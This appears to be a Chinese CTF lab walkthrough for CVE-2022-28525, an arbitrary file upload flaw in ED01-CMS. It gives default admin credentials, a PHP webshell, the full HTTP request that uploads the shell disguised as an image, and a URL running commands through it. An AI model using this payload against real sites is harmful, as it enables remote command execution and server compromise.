CVE-2022-28525

CVE-2022-28525

一、漏洞介绍

ED01-CMS v20180505 存在任意文件上传漏洞

二、渗透步骤
1、打开网站
http://eci-2zedq3hmmqo1q9yhiatg.cloudeci1.ichunqiu.com/

在这里插入图片描述

2、登录后台
# 账号:admin
# 密码:admin

在这里插入图片描述

3、WebShell
<?php 
	system($_GET[1]);
?>
4、文件上传

在这里插入图片描述

在这里插入图片描述

5、截取数据包
POST /admin/users.php?source=edit_user&id=41 HTTP/1.1
Host: eci-2zedq3hmmqo1q9yhiatg.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------29789280275122432703465352399
Content-Length: 1581
Origin: http://eci-2zedq3hmmqo1q9yhiatg.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2zedq3hmmqo1q9yhiatg.cloudeci1.ichunqiu.com/admin/users.php?source=edit_user&id=41
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1685453401,1685507993,1686039389,1686125034; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=ac8af30b24cdfe0a1face2ffbc13884c1698e153; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1686126285; PHPSESSID=d3avrn2g690cd2fi7bb0nskg7l
Upgrade-Insecure-Requests: 1

-----------------------------29789280275122432703465352399
Content-Disposition: form-data; name="user_id"

41
-----------------------------29789280275122432703465352399
Content-Disposition: form-data; name="user_uname"

admin
-----------------------------29789280275122432703465352399
Content-Disposition: form-data; name="user_email"

admin@aaa.com
-----------------------------29789280275122432703465352399
Content-Disposition: form-data; name="user_pass1"

admin
-----------------------------29789280275122432703465352399
Content-Disposition: form-data; name="user_pass2"

admin
-----------------------------29789280275122432703465352399
Content-Disposition: form-data; name="user_fname"

admin
-----------------------------29789280275122432703465352399
Content-Disposition: form-data; name="user_lname"

admin
-----------------------------29789280275122432703465352399
Content-Disposition: form-data; name="user_image"

new
-----------------------------29789280275122432703465352399
Content-Disposition: form-data; name="new_image"; filename="ant.php"
Content-Type: image/jpeg

<?php 
	system($_GET[1]);
?>

-----------------------------29789280275122432703465352399
Content-Disposition: form-data; name="user_role"

Administrator
-----------------------------29789280275122432703465352399
Content-Disposition: form-data; name="user_status"

Active
-----------------------------29789280275122432703465352399
Content-Disposition: form-data; name="updateusersubmit"


-----------------------------29789280275122432703465352399--

在这里插入图片描述

6、查看flag值
http://eci-2zedq3hmmqo1q9yhiatg.cloudeci1.ichunqiu.com/images/ant.php?1=cat%20/flag

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

liebe1*1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值